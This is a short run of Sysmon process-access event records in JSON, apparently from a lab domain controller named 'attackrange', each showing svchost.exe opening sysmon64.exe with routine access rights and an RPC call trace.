{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1499,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1500,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1501,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1502,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1503,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1504,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:46","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1505,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:46.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:46.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
